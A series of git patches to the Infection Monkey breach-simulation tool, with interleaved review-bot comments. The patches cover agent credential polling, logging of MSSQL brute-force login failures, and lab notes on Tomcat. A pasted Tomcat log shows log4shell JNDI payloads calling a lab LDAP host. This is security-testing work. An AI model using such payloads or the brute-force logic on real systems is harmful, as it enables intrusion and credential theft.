From 0fce4e88a552743c4c39cfd867b7cf26c763158f Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Mon, 2 May 2022 15:25:32 -0400
Subject: [PATCH 1/5] Agent: Drop CREDENTIALS_POLL_PERIOD_SEC from 30 to 10

---
 .../credential_store/aggregating_credentials_store.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/monkey/infection_monkey/credential_store/aggregating_credentials_store.py b/monkey/infection_monkey/credential_store/aggregating_credentials_store.py
index 27ead7d26..47f097dad 100644
--- a/monkey/infection_monkey/credential_store/aggregating_credentials_store.py
+++ b/monkey/infection_monkey/credential_store/aggregating_credentials_store.py
@@ -11,7 +11,7 @@ from .i_credentials_store import ICredentialsStore
 logger = logging.getLogger(__name__)
-CREDENTIALS_POLL_PERIOD_SEC = 30
+CREDENTIALS_POLL_PERIOD_SEC = 10
 class AggregatingCredentialsStore(ICredentialsStore):

From 2d685ef44a60ba86f510ebcbb634499245dd8ef2 Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Mon, 2 May 2022 15:42:36 -0400
Subject: [PATCH 2/5] Agent: Log agent's GUID

---
 monkey/infection_monkey/monkey.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py
index 8d01b3b9d..e31c62cad 100644
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@@ -116,7 +116,8 @@ class InfectionMonkey:
 logger.info("Another instance of the monkey is already running")
 return
- logger.info("Monkey is starting...")
+ logger.info("Agent is starting...")
+ logger.info(f"Agent GUID: {GUID}")
 self._add_default_server_to_config(self._opts.server)
 self._connect_to_island()

From 17db25b00bb4ea358672c34222d7c29a47381a3a Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Tue, 3 May 2022 08:22:53 -0400
Subject: [PATCH 3/5] Agent: Log MSSQL error when authentication fails

---
 monkey/infection_monkey/exploit/mssqlexec.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

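Review bot: The new `CREDENTIALS_POLL_PERIOD_SEC = 10` is a bare module constant with no comment on what it paces or why 10 s replaced 30 s; the commit subject only restates the numbers, and the only visible neighbour is the `AggregatingCredentialsStore` class header below it, so the reason has to be dug out of history. A one-line comment above the constant would fix that, e.g. `# Seconds between polls for newly collected credentials; presumably lowered from 30 so agents pick up propagated credentials sooner -- confirm`. Tripling the poll rate presumably also triples the request traffic this store generates per agent, which is worth a clause in that comment if many agents run at once.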
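Review bot: `GUID` is referenced by the added `logger.info(f"Agent GUID: {GUID}")` but is neither defined nor imported in the visible lines, so please confirm it is already in scope at module level in monkey.py; nothing in the hunk shows where it comes from. On style, the neighbouring log calls pass plain strings, and the lazy form `logger.info("Agent GUID: %s", GUID)` keeps the formatting out of the call when the level is disabled. The enclosing method starts before and continues after the hunk.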
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index f6b44471a..c765c2de5 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -242,7 +242,8 @@ class MSSQLExploiter(HostExploiter):
 self.report_login_attempt(True, user, password)
 cursor = conn.cursor()
 return cursor
- except pymssql.OperationalError:
+ except pymssql.OperationalError as err:
+ logger.info(f"Connection to MSSQL failed: {err}")
 self.report_login_attempt(False, user, password)
 # Combo didn't work, hopping to the next one
 pass

From 2f3c08cb77ecf01160b46fb52703ab8ddf0df1fe Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Tue, 3 May 2022 13:46:31 -0400
Subject: [PATCH 4/5] BB: Add a note about setting java.security.egd for tomcat

---
 envs/monkey_zoo/docs/fullDocs.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md
index 617106c4d..77ed166b9 100644
--- a/envs/monkey_zoo/docs/fullDocs.md
+++ b/envs/monkey_zoo/docs/fullDocs.md
@@ -915,7 +915,11 @@ Accessiable only through 3-45 Powershell using credentials reus
 Notes:
-
+The jvm's `java.security.egd` variable should be set to `/dev/urandom`,
+otherwise the tomcat service can take a very long time to start. Set this by
+editing `/usr/tomcat/bin/catalina.sh` and modifying the `JAVA_OPTS` vairable.
+See https://jfrog.com/knowledge-base/tomcat-takes-forever-to-start-what-can-i-do/
+for more details.

From 61793d56cf4661b680f5926bf3942aa01ea53635 Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Wed, 4 May 2022 10:30:55 -0400
Subject: [PATCH 5/5] BB: Add a note about clearing tomcat sessions

---
 envs/monkey_zoo/docs/fullDocs.md | 31 ++++++++++++++++++++++++++++++-
 1 file changed, 30 insertions(+), 1 deletion(-)

diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md
index 77ed166b9..077ccfc59 100644
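Review bot: The added `logger.info(f"Connection to MSSQL failed: {err}")` runs once per rejected user/password pair — the following `self.report_login_attempt(False, user, password)` and the comment about hopping to the next combo indicate this handler sits inside a credential loop — so a brute-force pass against one host will emit one INFO line per attempt on top of the report already made; `logger.debug(f"Connection to MSSQL failed: {err}")` is the better level for a per-attempt diagnostic. Note also that pymssql's `OperationalError` text for a rejected login typically carries the server's error message, which names the account, so the log gains usernames (not passwords) — acceptable here since `report_login_attempt` already receives both, but worth knowing before log files are shared. The trailing `pass` was dead before this change and is more obviously so now that the handler has a body; it can be dropped. The enclosing method and its `try` begin above the hunk.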
--- a/envs/monkey_zoo/docs/fullDocs.md
+++ b/envs/monkey_zoo/docs/fullDocs.md
@@ -919,7 +919,36 @@ Accessiable only through 3-45 Powershell using credentials reus
 otherwise the tomcat service can take a very long time to start. Set this by
 editing `/usr/tomcat/bin/catalina.sh` and modifying the `JAVA_OPTS` vairable.
 See https://jfrog.com/knowledge-base/tomcat-takes-forever-to-start-what-can-i-do/
-for more details.
+for more details.
+
+Tomcat sessions that carry over through a reset can cause significant delays
+when the tomcat server starts. When the server starts, it attempts to download
+the log4shell payload, but the server is no longer listening. This operation
+appears to have a 2 minute timeout. You can see it by viewing
+`/usr/tomcat/logs/localhost.log`:
+
+```
+2022-04-28 16:15:45,541 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Sending application start events
+2022-04-28 16:15:45,542 [localhost-startStop-1] INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- ContextListener: contextInitialized()
+2022-04-28 16:15:45,542 [localhost-startStop-1] INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- SessionListener: contextInitialized()
+2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session E5B004FF35E1CBB44FA8A69AB024941D
+2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:29573/dn=Exploit}'
+2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session 0677AD75F804B1FD4E24AF7F3BFA9DD9
+2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:39466/dn=Exploit}'
+2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filters
+2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filter 'Set Character Encoding'
+2022-04-28 16:20:07,477 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filter 'Compression Filter'
+```
+
+Notice the 2-minute gap between the timestamps after "loading attribute 'foo'".
+
+To resolve this, modify /usr/tomcat/conf/context.xml and uncomment the following
+setting:
+
+```
+
+```
+